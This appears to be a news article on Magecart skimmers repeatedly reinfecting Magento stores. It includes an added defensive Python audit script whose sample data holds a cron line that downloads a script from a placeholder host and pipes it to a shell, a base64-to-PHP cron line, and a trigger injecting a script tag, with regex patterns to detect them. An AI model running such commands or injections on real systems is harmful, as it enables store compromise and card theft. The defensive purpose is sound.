Sites Infected with Magecart Malware Reinfected Multiple Times

You may think that you’re safe after you’ve removed the malware from your infected online Magento store. However, it turns out that the infamous Magecart malware, known for harvesting credit card details from checkout forms, re-infects even after clean-up.

The researcher behind these findings is Willem de Groot, who recently unearthed the most successful skimming campaign to date, driven by the MagentoCore skimmer. As of September, the skimmer had infected 7,339 Magento stores over a period of 6 months, making it the most aggressive campaign discovered by researchers.

The same researcher is the developer of MageReport, an online malware and vulnerability scanner for online stores. According to de Groot, in the last quarter 1 out of 5 breached stores was infected (and cleaned) multiple times, some up to 18 times.

At Least 40,000 Magecart-Like Infections Discovered in 3 Years

The researcher has tracked infections similar to Magecart on at least 40,000 domains for the past three years. His latest findings indicate that during August, September and October, the MageReport scanner came across Magecart skimmers on more than 5,400 domains. Some of these infections turned out to be quite persistent, spending up to 12.7 days on infected domains.
In most cases, however, website admins successfully removed the malicious code. Still, the share of re-infected sites is quite large at 21.3 percent, with many reinfections taking place within the first day or within a week. The average time to reinfection was estimated at 10.5 days.

What is the reason for the reinfections? As explained by de Groot, there are several reasons accounting for the repeated malware cases:

  • The operators of Magecart often drop backdoors on hacked stores and create rogue admin accounts.
  • The malware operators use efficient reinfection mechanisms such as database triggers and hidden periodic tasks.
  • The operators also use obfuscation techniques to mask their code.
  • The operators often use zero-day exploits to hack vulnerable sites.
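As an added illustration (not part of the original article and not code from MageReport), the following Python script shows the kind of audit a store admin can run against the Magento database trigger list and the server crontab to spot the reinfection mechanisms listed above. The table names are standard Magento ones; the sample trigger rows, the cron lines and the keyword heuristics are constructed assumptions for this example.

```python
import re

# Constructed sample: rows as returned by
#   SELECT TRIGGER_NAME, EVENT_OBJECT_TABLE, ACTION_STATEMENT FROM information_schema.TRIGGERS
SAMPLE_TRIGGERS = [
    ("sales_order_after_insert", "sales_order",
     "BEGIN UPDATE sales_order_grid SET updated_at = NOW() WHERE entity_id = NEW.entity_id; END"),
    # A trigger that re-inserts a script tag into a footer setting every time the row is saved
    ("core_config_data_after_update", "core_config_data",
     "BEGIN UPDATE core_config_data SET value = CONCAT(value, "
     "'<script src=\"https://EXAMPLE-CDN.invalid/js.js\"></script>') "
     "WHERE path = 'design/footer/absolute_footer'; END"),
]

# Constructed sample crontab lines (output of `crontab -l` for the web user)
SAMPLE_CRON = [
    "*/5 * * * * php /var/www/html/bin/magento cron:run",
    "*/10 * * * * curl -s http://EXAMPLE.invalid/r.sh | sh",
    "0 3 * * * echo aW1wb3J0IG9z | base64 -d | php",
]

# Magento tables whose contents end up in rendered storefront pages
CONTENT_TABLES = {"core_config_data", "cms_block", "cms_page", "design_config_grid_flat"}
# Markers that have no business inside a legitimate trigger body (assumed heuristic)
TRIGGER_MARKERS = re.compile(r"<script|javascript:|base64|fromcharcode|eval\(", re.I)
# Download-and-execute or decode-and-execute patterns in cron entries (assumed heuristic)
CRON_MARKERS = re.compile(r"(curl|wget)[^|]*\|\s*(sh|bash|php)|base64\s+(-d|--decode)", re.I)


def suspicious_triggers(rows):
    """Return names of triggers that write script-like content into page-content tables."""
    hits = []
    for name, table, body in rows:
        touches_content = table in CONTENT_TABLES or any(
            t in body.lower() for t in CONTENT_TABLES)
        if touches_content and TRIGGER_MARKERS.search(body):
            hits.append(name)
    return hits


def suspicious_cron(lines):
    """Return crontab entries that pipe a download into an interpreter or decode base64."""
    return [line for line in lines if CRON_MARKERS.search(line)]


if __name__ == "__main__":
    print("triggers:", suspicious_triggers(SAMPLE_TRIGGERS))
    print("cron:", suspicious_cron(SAMPLE_CRON))
```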

Magecart Malware History and Overview of Attacks

While Magecart’s origins date back to around 2010, the first large-scale attack reportedly occurred in 2015, as documented by Sansec. This cybersecurity firm uncovered a startling revelation — cybercriminals had infiltrated 3,500 online stores by injecting malicious code into the headers or footers of shopping site pages. The injected JavaScript skillfully identified credit card numbers entered into checkout forms and utilized AJAX to duplicate and transmit the form data to a location controlled by the hackers.

Astonishingly, this compromise remained active for six months before detection, potentially exposing hundreds of thousands of harvested credit cards. Subsequently, Magecart attackers have continually refined their methods, including launching exploits targeting third-party website tools. In 2019, they compromised tools like the Picreel premium conversion optimization plugin, embedding their code to harvest payment details across thousands of websites. Notably, even Google Tag Manager has been exploited in similar ways.

In September 2018, the Magecart operators made another major hit, infiltrating the secure servers of the popular Newegg site. All entered data in the period between August 14 and September 18 was affected. Both desktop and mobile customers were compromised by the breach. Statistics revealed that the site has more than 50 million visitors. The fact that the digital skimmer code was available for a significant period of time gives security researchers reasons to believe that millions of customers were potentially affected.

In February 2017, the same researcher analyzed a piece of another evolved Magento malware which was capable of self-healing. This process was possible thanks to hidden code in the targeted website’s database.

Is Magecart Malware Still Around in 2023?

In short, yes.

A recently identified Magecart web skimming campaign, characterized by its sophistication and covert nature, has been specifically targeting Magento and WooCommerce websites. Notably, victims of this campaign include entities affiliated with significant organizations in the food and retail sectors.

Based on the evidence uncovered, it appears that this campaign has been operational for several weeks, and in certain instances, even longer. What sets this campaign apart is the utilization of a highly advanced concealment technique, surprising cybersecurity experts due to its unprecedented level of sophistication.

The campaign underscores the perpetual evolution of web skimming techniques. These methods are progressively advancing in sophistication, posing heightened challenges for detection and mitigation through static analysis and external scanning, researchers say. Threat actors operating in this field continuously innovate, employing more effective methods to conceal their attacks within victim websites and elude various security measures designed to expose them.

Milena Dimitrova